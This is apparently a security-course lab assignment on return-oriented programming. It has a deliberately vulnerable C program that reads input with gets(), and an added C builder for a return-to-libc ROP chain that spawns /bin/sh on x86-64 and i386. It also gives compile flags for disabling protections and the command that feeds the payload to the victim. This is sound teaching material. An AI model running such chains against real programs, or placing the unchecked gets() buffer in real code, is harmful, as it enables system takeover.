Return Oriented Programming (ROP)

Return-oriented programming is an attack technique that lets an attacker execute code of their choosing even when defensive measures such as executable space protection (non-executable memory segments, e.g. NX/DEP) are in place.

In a classic buffer overflow attack, the attacker writes shellcode into a local buffer on the stack and overwrites the saved return address so that it points back at that shellcode. Executable space protection defeats this: the stack is not executable, so returning into the injected code faults. ROP instead reuses instruction sequences that already exist in executable regions of memory (the program itself or its shared libraries), so nothing new needs to be made executable. A short sequence of instructions ending in RET is called a gadget, for example:

    pop %rdi
    retq

ROP chains such gadgets together: the attacker places a sequence of gadget addresses on the stack where the saved return address used to be, and each RET pops the next address, so the gadgets execute one after another. For this exercise the Stack-Smashing Protector and ASLR can be disabled (e.g. compile with -fno-stack-protector and set /proc/sys/kernel/randomize_va_space to 0).

Jump-start task

To get the hang of it, first perform a basic buffer overflow against the victim program with executable space protection disabled: place shellcode (which performs a system call to spawn a command shell) in the buffer and overwrite the return address so that it points at that shellcode. Next, enable executable space protection and repeat the attack using the ROP technique, i.e. carry out the attack with gadgets that already exist in the victim or its libraries. You may use an older library version to obtain a basic gadget such as the one shown above. The following is the sample victim program.

#include <stdio.h>
int main()
{
    char name[64];                 /* fixed-size buffer on the stack */
    puts("Input your name:");
    gets(name);                    /* no length check: bytes past 64 overwrite the saved frame pointer and return address */
    printf(", %s!\n", name);
    return 0;
}
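The following is an added example, not part of the original assignment, showing the stack layout of the ROP step above for both architectures the tasks ask for: a return-to-libc chain that calls system("/bin/sh") through the pop %rdi; retq gadget on x86-64, and the plain cdecl layout on i386. Every address (gadget, system(), exit(), the "/bin/sh" string) and the padding lengths (72 and 76) are placeholders chosen for illustration; on a real target they must be read from your own libc and binary with ASLR disabled (e.g. with gdb or ROPgadget) and the distance from name[] to the saved return address measured in a debugger.

```c
/* Added example: builds the raw bytes of a return-to-libc ROP payload for the
 * victim program above. Addresses and padding are ASSUMED placeholders; replace
 * them with values found on your target (ASLR and stack protector disabled). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_PAYLOAD 256

/* Placeholder x86-64 libc addresses (assumptions, not real values). */
static const uint64_t POP_RDI_RET = 0x00007ffff7e0123fULL; /* gadget: pop %rdi ; retq */
static const uint64_t RET_GADGET  = 0x00007ffff7e01240ULL; /* gadget: retq            */
static const uint64_t BIN_SH_64   = 0x00007ffff7f6b0f2ULL; /* "/bin/sh" inside libc   */
static const uint64_t SYSTEM_64   = 0x00007ffff7e3a290ULL; /* system() in libc        */

/* Placeholder i386 libc addresses (assumptions, not real values). */
static const uint32_t SYSTEM_32 = 0xf7e0e5f0u; /* system() in 32-bit libc            */
static const uint32_t EXIT_32   = 0xf7e01a70u; /* exit(): clean exit after the shell */
static const uint32_t BIN_SH_32 = 0xf7f5a0cfu; /* "/bin/sh" in 32-bit libc           */

/* Write one stack slot in little-endian byte order; return the next offset. */
static size_t put_u64(uint8_t *out, size_t pos, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        out[pos + i] = (uint8_t)(v >> (8 * i));
    return pos + 8;
}

static size_t put_u32(uint8_t *out, size_t pos, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        out[pos + i] = (uint8_t)(v >> (8 * i));
    return pos + 4;
}

/* x86-64 chain (System V ABI: first argument in %rdi). Stack, low -> high:
 *   pad_len filler bytes   overwrite name[64] and the saved %rbp
 *   POP_RDI_RET            lands in the saved return-address slot; main's
 *                          retq jumps here, and the gadget pops the next slot
 *   BIN_SH_64              popped into %rdi: the argument for system()
 *   RET_GADGET (optional)  one extra retq shifts %rsp by 8; include it when
 *                          system() otherwise faults on a misaligned stack
 *   SYSTEM_64              the gadget's retq "returns" into system()
 * Returns the payload length, or 0 if it would not fit. */
size_t build_chain_x86_64(uint8_t *out, size_t pad_len, int align_stack)
{
    size_t need = pad_len + (align_stack ? 4 : 3) * 8;
    if (need > MAX_PAYLOAD)
        return 0;
    memset(out, 'A', pad_len);
    size_t pos = put_u64(out, pad_len, POP_RDI_RET);
    pos = put_u64(out, pos, BIN_SH_64);
    if (align_stack)
        pos = put_u64(out, pos, RET_GADGET);
    pos = put_u64(out, pos, SYSTEM_64);
    return pos;
}

/* i386 chain (cdecl: arguments on the stack). Stack, low -> high:
 *   pad_len filler bytes   name[64], saved %ebp and any alignment padding
 *   SYSTEM_32              saved return address: main returns into system()
 *   EXIT_32                what system() sees as its own return address
 *   BIN_SH_32              system()'s first argument, at 4(%esp) on entry */
size_t build_chain_i386(uint8_t *out, size_t pad_len)
{
    size_t need = pad_len + 3 * 4;
    if (need > MAX_PAYLOAD)
        return 0;
    memset(out, 'A', pad_len);
    size_t pos = put_u32(out, pad_len, SYSTEM_32);
    pos = put_u32(out, pos, EXIT_32);
    pos = put_u32(out, pos, BIN_SH_32);
    return pos;
}

/* gets() stops at the first newline, so any address containing 0x0a truncates
 * the chain. NUL bytes are fine: gets() copies them. Returns 1 if usable. */
int chain_fits_gets(const uint8_t *payload, size_t len)
{
    return memchr(payload, '\n', len) == NULL;
}

int main(void)
{
    uint8_t payload[MAX_PAYLOAD];
    /* 72 = sizeof(name) + 8 bytes of saved %rbp is an assumed frame layout;
     * confirm the real offset with a cyclic pattern in gdb. */
    size_t len = build_chain_x86_64(payload, 72, 1);
    if (len == 0 || !chain_fits_gets(payload, len)) {
        fprintf(stderr, "payload unusable\n");
        return 1;
    }
    fwrite(payload, 1, len, stdout);   /* usage: ./build > payload */
    return 0;
}
```

Compile the victim with the protections the task allows you to drop (gcc -fno-stack-protector -no-pie -o victim victim.c; add -z execstack only for the shellcode step), then feed the payload with stdin kept open so the spawned shell does not exit on EOF: (cat payload; cat) | ./victim. The same builder with the i386 addresses and a 32-bit victim (gcc -m32) covers the other architecture.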

Minimal-requirement task

1) Design a more complex attack using gadget chaining.
2) Use the newest versions of all software modules involved (as new as possible).
3) The attack must work on both 32-bit and 64-bit architectures (depending on the complexity of your attack, this item may be moved to the bonus task).

Bonus task

Use popular software to demonstrate the attack. Come up with solutions (beyond the existing mitigations) to mitigate these attacks.